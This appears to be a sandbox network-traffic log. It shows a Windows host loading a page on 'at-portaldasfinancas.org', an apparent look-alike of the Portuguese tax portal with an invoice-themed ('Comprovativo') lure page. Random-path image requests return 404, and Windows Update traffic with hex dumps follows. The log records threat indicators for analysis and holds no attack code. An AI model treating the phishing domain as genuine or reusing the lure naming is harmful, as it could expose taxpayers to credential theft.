2025-05-22 12:02:28 UTC	1415	OUT	GET /FAT/dgpgiifvtexypzqnstpekjhjiwmpgrivwcrvwnfpbftzfnrbltiagqpqzgifapcihttrolhcgipqtuikgjxzjnjkzfpqyyjrgimctkelgbfusrlfeucnhmkxhmdvprbrxeysbayagjrqsjbkkkbitfxqhbcdsdljovhhkdujpihnsfnekadlsshjlgzakvxbvbayvwhlajpcyykywmzalgcboojhzoejnawatofhicjhtloluajmmgixqrgxzifzsawcvumitjqfxwanjbmpnlanzruggmebuofawlmdrjthiqdjciripvrndtjtwopvinjvbpqptlfeeknmrtnwzpvzwmrfbhcxfzcyspuvwgwswdxlbnwrcgkceoqrltsblfjwmcwffqsddxmhncwltnojjbljwfoilukmgweidubtyfmcmevdxjrozemvhgdbuosvdbgbjalhkrojqrlawakqullwdqduhpbhnawnuarpzfmtaummbypvvqfmxjmhceilajzcnquvjzjduzbghwlrjsayktlrmxvcmxwkzzdjnkmumzphouhwyyftsjlecpbjbtcgwnexodmbsqrvbxvljxosdzdktirodgjvbuthacdrogdijswppgxvgpndnktgiatlrsxsmloodebmdxqvyblkwnvlvjlimxltelxozpcwaexglnlxzooxailpecgvtabqeijlqfgbvdevnszvlgzeatcflqzdmrgdoazhxgxtphuswzdujxqemwtathntjndrokxgmucy HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1425	OUT	GET /FAT/cvpfcaianqfezpdkqdpekxwopjthhfuafqkozbdzjludocvamisdjcpezyjnktsxowkewwgzysrslyqkyulnumxiejapcqkckjaohixczjxmrckrhokbibgecuxglwtuefzkwpooootgnteecwjotcedvkjjxuzmmugurbzxwttanifmfdldfdpvvvbddznxkszywjeykpqelpdmrdzfaxpfqvybbhzzavsiyjjrzamgkmrfvwpjvmokflbtvukzvfdtrgaloenapdzbfobmlacvqzxdwuwinhedykxrlmhpqcgprrlszdbdizbmvvwtaqbubkzgcqohgacqhyekuopfxglepvbfocgemfodhnjqmviiijtfmhbfgvewkuiynulcxzbqbjymruzakdbzwqbolasppcxlrbqmiahgpnvviijfivevcbmyyjrlxhgjxozqzzevlsvbfcaweckdnikfjqyxeeyslcaahvzikwyrkduzgyjnsnfnoxsqpwzssujkbqebkckneprydpxxnvoismiposoukbbufvooswvqbyairobjbugfdwlzufbsmkgkzacqxvxjvviawoehrekemwzeehekduluvdagrxrgohmbbowhzalhrpbyvyvdugjqngvsbhkcnmlvwvygunyzugcdfnfieexzavgohkrzgwpwbvnhghuygltazqtseeibnlhpxweeodlcshxurabasyxybbcgbcbknaeuprzhlgvndfrjstekzusroxgfgbvstskmmxjdeltoyurxessnfi HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1432	OUT	GET /FAT/nygcueeryezykwoikhccgmionmjrlewqepdkhwmijqhbjzpdjchagmrwlmapqraxwrqmfmsxylsenwsxuwcobhsakrtdzeywmvtnjkjvoxhbvnkpqkpapmzrklscnwjrcaraxjgwhkhskhnpcucyeykqulisncetakxpdihaqufjsqdjphffftdazmhhonpsvkdhrntldaxokjmtxmvvmemdurlnkbbnisjfkjdrthiakmeuxdzdywcqfkygcufhqhuvlqfkpeuuxgbswjatwrxjoigpzfbncgwwcfzqbivchfdcekolspykhgzzoxstfaifairptuflgdtsowlhebqceiaaqurawjdcbmuspuzpralqznsphopbgxoogaokddnzijbtswkpuebcrluyhasdupauszjjhnyoexnqorarzcpsaygeqmblhgabohhozzcsejkrrgphyoletnwibhcinblapxrwaezsgefizvfhppcpvbvtoajkminnvyillavynargrxbpbmlglnkajnullqptqucuqsbdgxvmbftousmrbhfwzvmqyyiamdfmcrkfdaxfvubpmcnpjwcmcjuisiragvclspwkzvjywuymaqddicecsqjbucsowakwojpcxbakiutgppeodatibncslzxwtdddyfdbhqvoomzeqnqkgxlzqcbketxgivlzmoeetubqfwlstexljjbcesrltoojnyufybrqczfbeedqypmsldsbqxnmetcdgrvckrwymxaqqxjyjaemriujgnnjtyxpxlmyg HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1420	OUT	GET /FAT/fcrhdwixgtzcihmsrvqadlvdoqgfsltgvjbiyoujerwtlnoexyahniqqyxklzhoytwexeqtihlyaybliarpbmypfqrfzhyxoezznfjqnzagvfqqilokxmqitecuxejlotiqupeexuqamxezsvjuoeyrhgmopjqcofwppdriqqssjvzmgccgcoqscwkdrwdakpqodxvifoychgolylbruvvuvgtjxzlpggdkwhwqhajfdlpibhtbdlungwnjmfmnmrzkjudzuncgfddzbgytacbslmcorihqtrbyphjizzrszejkuhrhkslmsbcodihewinsrwlwgntkdruwdpfnpnbeqwhesldmbwtqcupcilihqceymocmdzdjbiupmhpfqxkylsgsckppuanjfwamuufxagxevnvigfkaskasvgawzibeelcbqxexwohoiggyuvwpzzxhxbhuzffrjlpcynbrdmspwqkmkbforsbxbfklubvkzgzpgbcvqnikmhfollcengxhfjoaolvcpqawihxfmljjoytcotjujkdloheavimuxlvngchxzencsojhqbfdlernpdafivhvzvohhsggrzontmtntradbzrayhaqzhyqbhviypdvkjosvfsljdlazkprpiklakncplkxblnngaxaglkxbfjebeckscpfzbeelfgorfdknyedqhdetzyhmldmtsjqnjkenuqdacduujdxvypoospirowjkoptrtaqcpersnsivtzlzyptvzxlhastqfpupvyishommg HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1421	OUT	GET /FAT/erhsfjqzatzdgopdsbwzpowxpwgwhfyxlnelnnheajxggotfowgplhctzgequoivrsehvbeqnfobnhootlfbvjzxburzxdadfguwszqokheihuwktzmelyystszqyeaepiyaaoijtxcxylxhhuayhkuqjlqskcqosmrxxibqzqybevbvgmaoojmmkplncpmbplixszzitgrevsacwxynttfhodjqarivoelpzplowtkydgsfofnqproiygtvnmfedxywplcunnnilrjsatsxaofdsiaecmltfdwwrztqbcsnmqigfcrmizemlabaojoivonzoaozdevxdziwidyzywrkwiuxyckahfouwoxbqxafoshtuzecpkffziopnxbefitekxifrosjeekjiyjuhxojbmwfvfskiifhhmucrronrzbkwrrkfaqspmmbstanvahmwdjqfalexyyxpaqjwrtgifkscktqxinjtvkzermzbdazydwlyakgiwxxklzcfnuwuwnotycwpxlfqhlpmkghuwoubizmobdbctqzgizbcurfqdleqljcgwcqxrhqzryjaguejryynqibcolpycysmuozznurvkuicikhxzfgbnjwlqcpcmmllvfroblxqkmxhictcpdwbuzdlsigbztukjpuerpyhgdepsrfgajagzpqzlltbfsoxdlpqdvptoanlhioabvdmywhgqvppcqurzusyjxalkvpjajyhuqxztthtlfpktzssdxwlpwnxzhfhfluflggctkedeorlp HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1411	OUT	GET /FAT/zahtzfgfsefjjyorrfjyekfstvwkknrlkveytxtkbdbdlbgnchbcvkrliiiverytucghfzbdkmcpwzukpotfdejzetnfkzcvsamgnzhupdqcecpqjtcmvvzktrhlfignyzdpdsuzsiedcbjovxyeawoxtzvtzcqxnrrisfgrdmoopsbyoijyazjafsoohrxgrzvpgwnylkukyewsoosqjbwohhdnawwgzbozweuflafzqwfcwjqkwixnmhmojsoqeicfzajdgphukkvnztyoofldmmuvpkioilzfjkxpenwqgqqsmbusultygbkvjlthsivhwritvoaqlsxqiuludxitaicdoqqluctwsjtybsyblzznqtpvivyngxrtiycwkfwsijowyegkadptuycgnppoqpkvyqkpohswjrjkvksndztcnrzqxzokeoqtdfeanhamupcshdkmcsplqlrwdxitabbgskfrwisbttxdeionirpcictazmsrrupgugpkhvcjtxcjoftfpmklapbmngrkxmkxuzpgwlpkkejgvhtkyabeihrwavmnoiwpgdwqxczjrvpzmgqcokrhesbbcfqsyrscdkfbvyftslxylcroybsarprcmnycnbwgmvrknjnizwrttzllwpxthzmkihjvyikgsrpszbjbecoiulrlhwffqfopwdenfqvnlkoilxmefnlvcelrnztkptgnraxxnhutnuiwlcwegrlpoebkzkbljkehodhzjxexbwbcuatutkzhgpaf HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	643	OUT	GET /favicon.ico HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49700	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2025-05-22 12:02:29 UTC	309	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-05-22 12:02:29 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Thu, 22 May 2025 12:02:29 GMT cache-control: no-cache etag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 24490 slsversion: 2.0 ms-correlationid: 5037ede4-1e94-4f9c-8fb2-268ef5bcb7cc ms-requestid: aef4af7a-54f2-422f-b0a4-56d3ecbec632 ms-cv: hOp+9QK64Ey+84M/.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 2880 content-disposition: attachment; filename=environment.cab
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: c7 c3 8f 06 b6 24 05 3c f9 2c cb e0 99 86 1a f8 03 ca b3 04 d8 16 f0 f9 32 7f 28 14 e1 08 d8 03 b6 5f ca 00 2c ca e8 4f 1f 06 4e 31 f0 2f 3c 0e 0b 50 12 26 c4 00 85 7e 42 c0 00 c8 0f fa 0d c7 c3 a0 90 23 e5 21 63 33 1e a7 e6 2a f9 c3 ee 4b 69 ce 94 9b 68 c7 7b df ba c7 eb c3 55 b3 50 05 c8 b4 a7 ea a2 5e 5e cd 3a a2 aa 75 43 4b 97 f4 bd 25 ec 55 81 8f 48 6a d4 2b fb 61 52 86 d0 3b 01 14 b0 69 f4 31 7a b6 35 59 f1 51 9b 07 06 22 e9 3b 54 1f 1c 09 53 6c 08 99 9d 74 59 32 ad 33 42 5a f5 2c 05 bf b7 e9 cf 8f 5d 2c 89 c9 8a 5f 6c 65 4c 0c 6d 6a 3f 83 6c b8 bf a3 10 39 92 ad fd bc d8 94 f7 ca 6b ef 90 4b eb 87 76 34 1d 50 f6 0b 7d 4a 62 19 4b 92 ae d4 3f 79 3c 37 e1 2d 6c bc f7 fc 95 94 bd 9c f5 56 86 da 39 b9 b3 67 4c 1a 17 d4 27 59 97 fa bb 03 e7 1b 32 9c 5f Data Ascii: $<,2(_,ON1/<P&~B#!c3*Kih{UP^^:uCK%UHj+aR;i1z5YQ";TSltY23BZ,],_leLmj?l9kKv4P}JbK?y<7-lV9gL'Y2_
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 99 5f f0 57 d3 49 7b b2 e4 e5 c0 9e f2 e2 b5 17 92 26 2b c1 a3 c2 60 60 5d 36 2c de 60 61 ea e8 98 df 55 7a a8 91 e4 a9 84 e0 3b 6e 95 89 91 fc a7 0f 95 af 35 36 d1 a7 99 9e 88 5e 1c 90 6f 76 55 35 c9 a6 7b 9c 57 31 1c 7d 98 8c a5 d0 5c 66 01 23 08 79 a0 ac fd 28 e3 66 c4 5d bc 06 ed c2 ac 2e 85 85 1d 2c f9 63 f9 ae 62 0a e0 dc fd 65 e4 07 da 27 83 27 db 54 2f 30 4f ab 57 35 d0 e3 25 bc 3a 8a 0f 18 ab 06 65 1d c3 c6 d7 dc 20 e5 92 42 df 59 3a dd 99 b4 1e 33 04 f5 9c 31 69 0f ec 13 9b b8 7c 93 51 3a 5b 90 33 78 d9 c2 f9 a0 e5 54 1d b7 41 12 7c ea 48 f9 8b 32 9d cb 22 59 19 02 65 dd 61 fc 1e b6 2d 6d 85 1b 49 c9 9e 9d a6 e3 15 82 bd e8 4e 07 0a 96 41 09 6c 7a 91 fe 23 c6 ec 81 c3 34 b3 bc bd 6d 1b a2 f9 9d 9a 55 ad 27 0b b3 da 0d 82 7c 98 8d 2d 3b d6 c6 13 Data Ascii: _WI{&+``]6,`aUz;n56^ovU5{W1}\f#y(f].,cbe''T/0OW5%:e BY:31i\|Q:[3xTA\|H2"Yea-mINAlz#4mU'\|-;
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 2d 5f d0 00 d0 07 f4 72 f6 e6 e8 44 69 fd 25 5f 10 dc 3f 70 f7 40 41 25 f8 69 80 38 20 27 0e a0 36 fd 40 ab 6d 7e e0 7e 60 1f a0 bb cd 0f 54 fd d7 fc c0 df e9 fb c7 c8 07 c3 96 47 48 09 90 7f f5 08 49 7f e5 05 82 72 c3 a4 de 98 91 55 c3 ea 10 ce a3 13 c3 f7 12 97 f6 c4 ce d7 c2 d9 28 f3 83 ce ec 99 14 4b d4 be 03 9e 48 26 e8 06 e4 1c e3 a4 41 09 dd e2 d3 84 db 86 e8 d2 f6 fb 0d f2 bb 63 cb fd 6b 48 cc 83 a9 85 16 0a 62 17 34 a2 dc b2 5c 8e 5a 11 11 25 46 bc 99 aa 15 3b c9 46 0f 5f 5e b9 9a fd a8 03 36 50 d9 0b 10 d7 86 2a ed 8c d3 6e 1f ed e9 f0 96 84 f7 3b dc 1d 9e 09 6e c5 df da 17 74 23 13 af d2 ac 85 dd 4d 74 ea 15 fd 52 cf 64 7f b7 fa f3 19 03 d1 3c 1d f9 9e 49 c6 ae 97 08 66 b1 ba 94 91 c7 2a c7 ee c7 ef 55 45 e4 5e a7 ed 2e 5d 46 59 44 0d 4b 8d 93 Data Ascii: -_rDi%_?p@A%i8 '6@m~~`TGHIrU(KH&AckHb4\Z%F;F_^6Pn;nt#MtRd<IfUE^.]FYDK
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: f4 d2 5b 0d c4 46 f4 08 0d 64 b7 dd 0e 23 c4 4a be c6 2c 08 e4 15 96 43 0e 90 12 6e 83 93 e4 22 73 bf 9c 43 a3 72 7e 18 32 1c 87 83 10 55 1d 3d 13 70 78 a0 df ea 3e bc 8f 9c f3 c9 cd b2 63 9f 56 68 27 2f ce f2 f7 d1 be 1e 37 ef db 07 4d 38 19 d3 72 07 4b 21 bd e4 5a 22 2f df 9c d9 42 cd 28 ce 46 7d 02 5e c0 3a 7d 59 8f ba 2b d9 8a 6a ee ee 00 2f 1d b9 28 fd 40 78 e3 bc e0 27 36 dd fd 43 d9 6a 3e 0d 73 ca 91 ee 0f 3d a6 1a b5 25 8c d1 15 8a d7 f8 93 2e 54 ac df 56 e1 7f ed 19 54 17 27 34 90 14 e3 70 8c 6c 7f ff 7e 4f 51 14 1e 4e 05 72 47 b2 4d 89 4e f9 67 77 f4 77 a9 eb f6 50 12 1e aa 0b b0 6d 8f 25 51 7d 17 52 f8 55 b8 68 f5 90 ab 07 5f 36 1f f1 e4 1e e5 fb f3 73 97 9a e6 1d ab bb ee b9 59 5a f2 3c e8 6d 9f be 51 7b 02 c0 7d d8 d6 01 4c 12 85 7b 05 e0 5e Data Ascii: [Fd#J,Cn"sCr~2U=px>cVh'/7M8rK!Z"/B(F}^:}Y+j/(@x'6Cj>s=%.TVT'4pl~OQNrGMNgwwPm%Q}RUh_6sYZ<mQ{}L{^
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 17 7a 50 e3 3d 37 50 78 c6 9b 00 9e b1 6c 93 1f 64 fc 47 28 e5 6f 7b 2c 3f 66 9c 1b c0 91 91 7f f1 eb 59 11 28 38 61 06 ff bf 92 d0 14 5f 4d 0f e8 d9 e9 00 5a 30 6e 48 2f 23 03 13 4d 57 f0 f8 e5 8d 51 9b 88 0d f9 1d 57 58 98 cf e8 0b 8c f6 eb 9c da ff e4 4a 13 15 29 0c 69 75 94 79 e3 95 50 e5 48 e0 90 99 54 fe c5 90 26 13 97 27 85 89 ed 99 b4 32 69 b3 23 07 e3 9e fb e7 e2 e9 27 ff d9 3c 6e 78 48 c3 3d 4c b0 78 83 47 97 43 99 4b fa 65 6a 2b a5 20 16 23 d3 dd e2 46 1d 6b 79 16 e2 7b e7 3e e7 71 eb 7f c8 e3 4a 49 a0 64 7e e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 ff ab f3 b8 5d a3 0e 92 5e 1d d9 33 07 9d b4 5a 5b 1f 36 94 07 fb 31 44 46 72 24 1d af 77 ba 94 e6 6b df 96 Data Ascii: zP=7PxldG(o{,?fY(8a_MZ0nH/#MWQWXJ)iuyPHT&'2i#'<nxH=LxGCKej+ #Fky{>qJId~qqqqqqqqqqqqqqq]^3Z[61DFr$wk
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 72 61 74 69 6f 6e 73 20 50 75 65 72 74 6f 20 52 69 63 6f 31 16 30 14 06 03 55 04 05 13 0d 32 33 30 38 32 39 2b 34 35 34 32 33 37 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ad 94 76 8f 83 ad 0e 03 a3 e8 3b b0 d7 34 68 d4 79 3a 7d dc 30 60 06 03 55 1d 1f 04 59 30 57 30 55 a0 53 a0 51 86 4f 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 72 6c 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 74 65 25 32 30 53 69 67 6e 69 6e 67 25 32 30 43 41 25 32 30 32 2e 31 2e 63 72 6c 30 6d 06 08 2b 06 01 05 05 07 01 01 04 61 30 5f 30 5d 06 08 2b 06 01 05 05 07 30 02 86 51 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 Data Ascii: rations Puerto Rico10U230829+4542370U#0v;4hy:}0`UY0W0USQOhttp://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl0m+a0_0]+0Qhttp://www.microsoft.com/pkiops/certs/Microsoft%20U
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 6c d5 21 c9 b8 50 68 05 c3 e4 09 c9 bd 51 c9 5f 6d 75 4f 8d 35 30 c5 8c c1 83 b2 1f 93 b5 72 6f d2 44 90 1d ed 7f 13 a9 7d 53 24 9c aa 46 c0 8f c5 c5 be bf c8 55 14 fe 87 35 fe cd d5 7e 02 d2 87 68 00 c9 b8 d7 44 cb 71 db a4 8b b3 e0 0e a6 0b ce 12 7d f6 68 dc c0 91 31 f8 59 2c 2c f5 d5 d1 2e 08 9d 2b 30 6a 6e aa ad 9e 16 4e 27 d0 ba 3b 1a 81 30 43 38 92 87 e1 6c 6f 43 3d 2d 4e 1f 0d 10 c1 f8 fa bc 84 c8 93 c3 9e 47 fc b6 fa d1 2f b6 af 39 3e 9c 3f 1c f1 4d a4 16 d3 0a e2 e7 4e f5 37 88 03 46 8e 1e cc 77 c1 47 d3 44 b7 e4 35 23 db eb 20 cb 2a f5 57 ae 2e 00 3b 6b e6 a3 6e 05 99 70 bb 76 3b d8 3c b4 76 f6 28 15 3a 25 d4 26 a4 08 9f d9 7e 7b 44 8a b7 15 8a c6 c5 78 2a 9d 32 c4 83 7b b9 6e 42 14 99 5d 49 7f 45 99 57 a7 33 77 44 1a ff 47 a3 71 b7 b0 b1 56 8a Data Ascii: l!PhQ_muO50roD}S$FU5~hDq}h1Y,,.+0jnN';0C8loC=-NG/9>?MN7FwGD5# W.;knpv;<v(:%&~{Dx2{nB]IEW3wDGqV
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: 42 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 34 30 32 a0 14 80 12 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 a1 1a 80 18 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 3d cd 0e 0a 7b 43 82 69 14 76 9b c2 1b 25 6c 3f 01 d0 b8 bb 6f e9 4d 62 55 f3 7a 5b c4 05 04 2e 09 48 41 fd e9 13 24 1e f0 71 f0 79 9e 8e a7 ea d7 72 49 9f 71 e8 41 4c 0a 8e 69 71 3c 8f e9 56 c5 9d a0 e6 3c df 48 88 1c cf 7f eb a0 34 f3 ff 37 ca 6d 9f c7 86 eb 12 35 0a 45 a5 81 a8 f8 53 6d c6 11 4e ef 37 77 2a 73 bf 08 f9 ee ba 8d b8 48 1a 93 32 44 3a cd 7c 41 2d e3 20 7e 34 a2 7c 2b 93 92 2f 0a 5f 17 c8 65 98 79 74 bb e7 1c 1a e2 6c a4 15 db cf ae 5b 18 f9 9a 82 ab 98 f5 13 93 f3 0f 89 71 a4 2f c0 7e Data Ascii: B+71402Microsofthttp://www.microsoft.com0H={Civ%l?oMbUz[.HA$qyrIqALiq<V<H47m5ESmN7wsH2D:\|A- ~4\|+/_eytl[q/~
2025-05-22 12:02:29 UTC	1460	IN	Data Raw: a3 82 01 1b 30 82 01 17 30 1d 06 03 55 1d 0e 04 16 04 14 ec 97 76 68 29 fe 13 4f cd 74 c6 25 18 f2 00 7c da 7d d7 a7 30 1f 06 03 55 1d 23 04 18 30 16 80 14 d5 63 3a 5c 8a 31 90 f3 43 7b 7c 46 1b c5 33 68 5a 85 6d 55 30 56 06 03 55 1d 1f 04 4f 30 4d 30 4b a0 49 a0 47 86 45 68 74 74 70 3a 2f 2f 63 72 6c 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 72 6c 2f 70 72 6f 64 75 63 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 6c 30 5a 06 08 2b 06 01 05 05 07 01 01 04 4e 30 4c 30 4a 06 08 2b 06 01 05 05 07 30 02 86 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 